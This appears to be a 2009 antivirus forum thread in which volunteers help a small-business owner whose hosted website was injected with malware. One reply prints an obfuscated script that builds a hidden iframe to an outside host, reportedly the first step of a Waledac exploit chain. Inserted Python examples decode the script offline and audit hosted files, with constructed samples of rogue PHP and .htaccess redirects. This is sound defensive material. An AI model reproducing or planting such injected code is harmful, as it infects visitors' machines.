Author Topic: my own website (that I built) suddenly has trojan horse - help!


eden99

  • Guest
Someone alerted me today that when they visited my website (a simple site I built in Dreamweaver and have used problem-free for the last couple of years, http://www.sierra-dogs.com ) they were told that there was malware or a trojan horse.  I went to the website (I use Firefox as a browser) and Avast alerted me that it found a sample of the trojan horse HTML:IFrame-GZ [Trj].  The only option given to me in the Avast warning dialog box is "abort connection."

So, I have a few questions.  How do I get more info about what Avast has detected?  Also, I noticed on another thread some suggestions to clean your computer, and I will try those.  But how should I make sure that not just my computer, but my website (hosted through Lunarpages.com -- I upload everything through FTP) is cleaned as well???  I am losing potential customers!  How do I protect the web pages in the future?  Did it get infected from my files, or is someone able to get the malware on my site some other way?

Thank you in advance for any suggestions/answers.


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33904
  • malware fighter
Re: my own website (that I built) suddenly has trojan horse - help!
« Reply #1 on: June 18, 2009, 11:23:23 AM »
Hi eden99,

Yes, there is a big chunk of obfuscated, probably SQLrow, malcode there that avast apparently flags:
Code:
EDITED and SHORTED script type="text/j*v*script"var qhEHJJekBOuKGRbXCPKz = ^..........."ewLOJ60ewLOJ105ewLOJ102ewLOJ114ewLOJ97ewLOJ109ewLOJ101ewLOJ32ewLOJ119ewLOJ105ewLOJ100ewLOJ116ewLOJ104ewLOJ61ewLOJ34ewLOJ52ewLOJ56ewLOJ48ewLOJ34ewLOJ32ewLOJ104ewLOJ101ewLOJ105ewLOJ103ewLOJ104ewLOJ116ewLOJ61ewLOJ34ewLOJ54ewLOJ48ewLOJ34ewLOJ32ewLOJ115ewLOJ114ewLOJ99ewLOJ61ewLOJ34ewLOJ104ew.........LOJ116ewLOJ116ewLOJ112ewLOJ58ewLOJ47ewLOJ47ewLOJ104ewLOJ105ewLOJ116ewLOJ45ewLOJ115ewLOJ101ewLOJ110ewLOJ100ewLOJ101ewLOJ114ewLOJ115ewLOJ46ewLOJ99ewLOJ110ewLOJ47ewLOJ102ewLOJ105ewLOJ110ewLOJ100ewLOJ47ewLOJ105ewLOJ110ewLOJ46ewLOJ99ewLOJ103ewLOJ105ewLOJ63ewLOJ55ewLOJ34ewLOJ32ewLOJ115ewLOJ116ewLOJ121ewLOJ108ewLOJ101ewLOJ61ewLOJ34ewLOJ98ewLOJ111ewLOJ114ewLOJ100ewLOJ101ewLOJ114ewLOJ58ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ112ewLOJ111ewLOJ115ewLOJ105ewLOJ116ewLOJ105ewLOJ111ewLOJ110ewLOJ58ewLOJ114ewLOJ101ewLOJ108ewLOJ97ewLOJ116ewLOJ105ewLOJ118ewLOJ101ewLOJ59ewLOJ32ewLOJ116ewLOJ111ewLOJ112ewLOJ58ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ108ewLOJ101ewLOJ102ewLOJ116ewLOJ58ewLOJ45ewLOJ53ewLOJ48e............wLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ58ewLOJ48ewLOJ59ewLOJ32ewLOJ102ewLOJ105ewLOJ108ewLOJ116ewLOJ101ewLOJ114ewLOJ58ewLOJ112ewLOJ114ewLOJ111ewLOJ103ewLOJ105ewLOJ100ewLOJ58ewLOJ68ewLOJ88ewLOJ73ewLOJ109ewLOJ97ewLOJ103ewLOJ101ewLOJ84ewLOJ114ewLOJ97ewLOJ110ewLOJ115ewLOJ102ewLOJ111ewLOJ114ewLOJ109ewLOJ46ewLOJ77ewLOJ105ewLOJ99ewLOJ114ewLOJ111ewLOJ115ewLOJ111ewLOJ102ewLOJ116ewLOJ46ewLOJ65ewLOJ108ewLOJ112ewLOJ104ewLOJ97ewLOJ40ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ61ewLOJ48ewLOJ41ewLOJ59ewLOJ32ewLOJ45ewLOJ109ewLOJ111ewLOJ122ewLOJ45ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ58ewLOJ48ewLOJ34ewLOJ62ewLOJ60ewLOJ47ewLOJ105ewLOJ102ewLOJ114ewLOJ97ewLOJ109ewLOJ101ewLOJ62";var wqfYyLudgHIXoMexWJhX !! 
qhEHJJekBOuKGRbXCPKz.split("ewLOJ");var XbidtJBvZLvVCbuBmoeS = "";for (v*r wnqkAUhXdPuBrdekmggM=1; wnqkAUhXdPuBrdekmggM<wqfYyLudgHIXoMexWJhX.length; wnqkAUhXdPuBrdekmggM++){XbidtJBvZLvVCbuBmoeS+=String.fromCharCode(wqfYyLudgHIXoMexWJhX[wnqkAUhXdPuBrdekmggM]);}var VyodIJUOXMuOEyNuLfLF = ""+XbidtJBvZLvVCbuBmoeS+"";document.wr&te(""+VyodIJUOXMuOEyNuLfLF+"")^script^

Update and patch the software you use, change your log-in password for a stronger one, but it can also be the server software at the hosting firm that has vulnerabilities that were explored. Contact them and give them the link to this posting. It is a common thing that reputable, reliable websites that have no strong protection are being hacked by cybercriminals.

polonus

« Last Edit: June 18, 2009, 11:36:25 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
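The script polonus quotes above rebuilds hidden HTML at load time: a long string of character codes separated by a junk delimiter ("ewLOJ"), split and fed through String.fromCharCode, then handed to document.write. A site owner who finds such a block can decode it offline, without ever running the JavaScript, and see what it injects. The Python below is an added example, not code from this thread, from Avast or from the site in question: it detects the split()+fromCharCode idiom in a saved copy of a page, decodes every candidate string, and reports iframes that are sized to zero or styled invisible. The sample page, payload and the http://example.invalid/ URL are constructed; the only value borrowed from the thread is the delimiter.

```python
"""Decode split()+String.fromCharCode obfuscation offline and report hidden iframes.

Added example; not code from the thread. The only value borrowed from the
thread is the delimiter "ewLOJ"; the sample page, payload and URL are constructed.
"""
from __future__ import annotations

import re
from html.parser import HTMLParser

# The injected script's decoding idiom: <literal>.split("<delim>") fed to String.fromCharCode.
SPLIT_RE = re.compile(r'\.split\(\s*["\']([^"\']+)["\']\s*\)')
STRING_RE = re.compile(r'["\']([^"\']{16,})["\']')
# Styles that make a frame invisible (the thread's payload uses opacity:0 and a large negative offset).
HIDDEN_STYLE_RE = re.compile(
    r"opacity\s*:\s*0(?![.\d])|visibility\s*:\s*hidden|display\s*:\s*none|(?:left|top)\s*:\s*-\d{3,}px",
    re.I,
)


def decode_split_charcodes(page: str) -> list[str]:
    """Rebuild every string the page would assemble from delimiter-separated char codes.

    Pure string work: nothing in the page is executed.
    """
    if "String.fromCharCode" not in page:
        return []
    decoded = []
    for delim in sorted(set(SPLIT_RE.findall(page))):
        for literal in STRING_RE.findall(page):
            tokens = [t for t in literal.split(delim) if t]  # a leading delimiter yields an empty token
            if len(tokens) < 8 or not all(t.isdigit() for t in tokens):
                continue
            decoded.append("".join(chr(int(t)) for t in tokens))
    return decoded


class _IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.iframes: list[dict[str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def hidden_iframes(html: str) -> list[dict[str, str]]:
    """Return iframe tags that are sized away or styled invisible."""
    parser = _IframeCollector()
    parser.feed(html)
    found = []
    for attrs in parser.iframes:
        tiny = attrs.get("width", "").strip() in ("0", "1") or attrs.get("height", "").strip() in ("0", "1")
        if tiny or HIDDEN_STYLE_RE.search(attrs.get("style", "")):
            found.append(attrs)
    return found


def scan_page(page: str) -> list[dict[str, str]]:
    """Findings from the raw markup and from each decoded payload."""
    findings = [{"where": "raw", "src": f.get("src", "")} for f in hidden_iframes(page)]
    for payload in decode_split_charcodes(page):
        findings.extend({"where": "decoded", "src": f.get("src", "")} for f in hidden_iframes(payload))
    return findings


# --- constructed fixture (not a real page) -------------------------------
SAMPLE_DELIM = "ewLOJ"  # delimiter from the thread's sample
SAMPLE_PAYLOAD = '<iframe width="0" height="0" src="http://example.invalid/injected" style="opacity:0"></iframe>'


def _encode_like_sample(payload: str, delim: str) -> str:
    """Lay the fixture out in the delimiter-prefixed char-code form the thread shows."""
    return "".join(delim + str(ord(c)) for c in payload)


SAMPLE_PAGE = (
    "<html><body><p>Sierra dogs</p>"
    '<script type="text/javascript">var a = "' + _encode_like_sample(SAMPLE_PAYLOAD, SAMPLE_DELIM) + '";'
    'var b = a.split("' + SAMPLE_DELIM + '");var c = "";'
    "for (var i=1; i<b.length; i++){c+=String.fromCharCode(b[i]);}document.write(c);</script>"
    "</body></html>"
)

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(f"hidden iframe ({finding['where']}): {finding['src']}")
```

Run it against a page saved with the browser or fetched with a non-executing client; the decoded src tells you where visitors were being sent, which is the detail to hand to the host along with the ticket.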

eden99

  • Guest
Re: my own website (that I built) suddenly has trojan horse - help!
« Reply #2 on: June 18, 2009, 02:24:34 PM »
Thank you, Polonus!  I've opened a help ticket with my hosting company, and will hopefully get this resolved soon. 

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89062
  • No support PMs thanks
Re: my own website (that I built) suddenly has trojan horse - help!
« Reply #3 on: June 18, 2009, 03:17:15 PM »
Quote
Thank you, Polonus!  I've opened a help ticket with my hosting company, and will hopefully get this resolved soon.

Don't hold your breath; some are woefully slow. Hopefully your Host will step up.

This is commonly down to old content management software being vulnerable; see this example of a Host's response to a hacked site.
Quote
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains.  We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

1. Check all index pages for any signs of JavaScript injected into their coding. On Windows servers check any "default.aspx" or "default.cfm" pages as those are popular targets too.

2. Remove any "rogue" files or PHP scripts uploaded by the hackers into your account. Such scripts allowed them to make account-wide changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

3. Check all .htaccess files, as hackers like to load re-directs into them.

4. Change all passwords for that end user account: the cp password, the FTP password, and any FTP sub-accounts. Make sure to use a "strong" password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This, coupled with our server-side changes, should prevent any resurfacing of the hackers' efforts. In some cases you may still have coding which allows for injection. All user input fields, hidden or not, should be hard coded, filtered, and sanitized before being handed off to PHP or a database, which will prevent coding characters from being submitted and run through your software.


Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.3.6108 (build 24.3.8975.762) UI 1.0.801/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security
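The host's four clean-up steps quoted above (inspect index pages for injected script, remove rogue PHP uploads, check .htaccess for redirects, then rotate passwords) become much easier when the site owner still has the clean originals locally, as eden99 does, since everything was uploaded over FTP. The Python below is an added example, not the host's or the forum's code: it hashes the local tree and a downloaded copy of the hosted tree, lists files that were modified or that only exist on the host, and then applies the host's checks to exactly those files. The directory layout, page contents, the .htaccess rule and the placeholder PHP file are all constructed for the demo.

```python
"""Audit a hosted copy of a site against the local originals.

Added example; not the host's or the forum's code. Mirrors the quoted clean-up
steps: modified index pages with injected markup, rogue PHP uploads, .htaccess
redirects, plus a hash comparison so "re-upload the originals" has a concrete
diff to work from. Directory layout and file contents are constructed.
"""
from __future__ import annotations

import hashlib
import re
import tempfile
from pathlib import Path

INDEX_NAMES = {"index.html", "index.htm", "index.php", "default.aspx", "default.cfm"}
# Idioms of injected blocks: char-code decoding, document.write, zero-sized frames.
INJECTED_JS_RE = re.compile(
    r"String\.fromCharCode|document\.write\s*\(|<iframe[^>]*?(?:width|height)=[\"']?0\b", re.I)
# PHP constructs typical of uploaded rogue scripts (legitimate site code rarely evals decoded data).
ROGUE_PHP_RE = re.compile(r"\b(?:eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)
# .htaccess directives that send visitors elsewhere.
HTACCESS_RE = re.compile(r"^\s*(?:Redirect(?:Match|Permanent)?|RewriteRule)\b.*$", re.I | re.M)


def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def tree_hashes(root: Path) -> dict[str, str]:
    """Relative POSIX path -> SHA-256 for every file under root (dotfiles included)."""
    return {p.relative_to(root).as_posix(): sha256_of(p) for p in root.rglob("*") if p.is_file()}


def audit(local_root: Path, hosted_root: Path) -> dict:
    """Compare the hosted tree with the local originals and inspect only what differs."""
    local, hosted = tree_hashes(local_root), tree_hashes(hosted_root)
    report = {
        "modified": sorted(f for f in hosted if f in local and hosted[f] != local[f]),
        "unexpected": sorted(f for f in hosted if f not in local),  # candidates for rogue uploads
        "injected_index": [],
        "rogue_php": [],
        "htaccess_redirects": {},
    }
    for rel in report["modified"] + report["unexpected"]:
        path = hosted_root / rel
        text = path.read_text(errors="replace")
        name = path.name.lower()
        if name in INDEX_NAMES and INJECTED_JS_RE.search(text):
            report["injected_index"].append(rel)
        if name.endswith(".php") and ROGUE_PHP_RE.search(text):
            report["rogue_php"].append(rel)
        if name == ".htaccess":
            redirects = HTACCESS_RE.findall(text)
            if redirects:
                report["htaccess_redirects"][rel] = redirects
    return report


def build_fixture(base: Path) -> tuple[Path, Path]:
    """Constructed local/hosted trees: one page tampered with, two files added on the host."""
    local, hosted = base / "local", base / "hosted"
    local.mkdir()
    (hosted / "img").mkdir(parents=True)
    clean_index = "<html><body><h1>Sierra Dogs</h1></body></html>\n"
    about = "<html><body><p>About</p></body></html>\n"
    (local / "index.html").write_text(clean_index)
    (local / "about.html").write_text(about)
    (hosted / "about.html").write_text(about)  # untouched on the host
    (hosted / "index.html").write_text(clean_index.replace(
        "</body>", '<iframe src="http://example.invalid/injected" width="0" height="0"></iframe></body>'))
    (hosted / ".htaccess").write_text(
        "RewriteEngine On\nRewriteRule ^(.*)$ http://example.invalid/ [R,L]\n")
    (hosted / "img" / "x.php").write_text("<?php eval(base64_decode('PLACEHOLDER')); ?>\n")
    return local, hosted


def run_demo() -> dict:
    """Build the constructed trees in a temp dir and return the audit report."""
    with tempfile.TemporaryDirectory() as tmp:
        local, hosted = build_fixture(Path(tmp))
        return audit(local, hosted)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

In practice the hosted tree is a fresh FTP download into an empty directory; anything under "unexpected" is reviewed and removed, anything under "modified" is replaced from the originals, and the password rotation (step 4) happens before the clean files go back up, since the upload itself travels over the credentials that were presumably used to plant the changes.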

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33904
  • malware fighter
Re: my own website (that I built) suddenly has trojan horse - help!
« Reply #4 on: June 18, 2009, 03:50:57 PM »
Hi eden99 and DavidR,

It's an obfuscated malicious script, in an invisible iframe, that redirects to a .cn site with a frame containing a porn site. This porn site has a JavaScript that redirects to a web server containing various exploits for Adobe PDF Reader and Flash Player.
If the exploit is successful, your machine will become a zombie PC of the Waledac botnet.
Information on this malcode courtesy of 10mik33mik (malcode expert)
Removal instructions for this Waledac.cn trojan: http://forums.spybot.info/showthread.php?t=46822
Latest on another variant the Waledac worm: http://garwarner.blogspot.com/2009/04/waledac-moving-on-to-canadian-pharmacy.html

polonus
« Last Edit: June 18, 2009, 04:00:50 PM by polonus »

grahambell

  • Guest
Re: my own website (that I built) suddenly has trojan horse - help!
« Reply #5 on: June 18, 2009, 09:18:21 PM »
Had a similar problem with a simple web site of my own some years back. Alerted my hosting company and they advised me to re-ftp the original files from my computer, which at least got rid of the virus on the site, so worth trying that ASAP.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89062
  • No support PMs thanks
Re: my own website (that I built) suddenly has trojan horse - help!
« Reply #6 on: June 18, 2009, 09:36:44 PM »
Some years ago this type of thing (not this complex) wasn't around, and simply uploading new clean pages will last a very short time; some are even reinfected in the FTP process.

Now, as my quote from another Host shows, these are the lengths you have to go to now.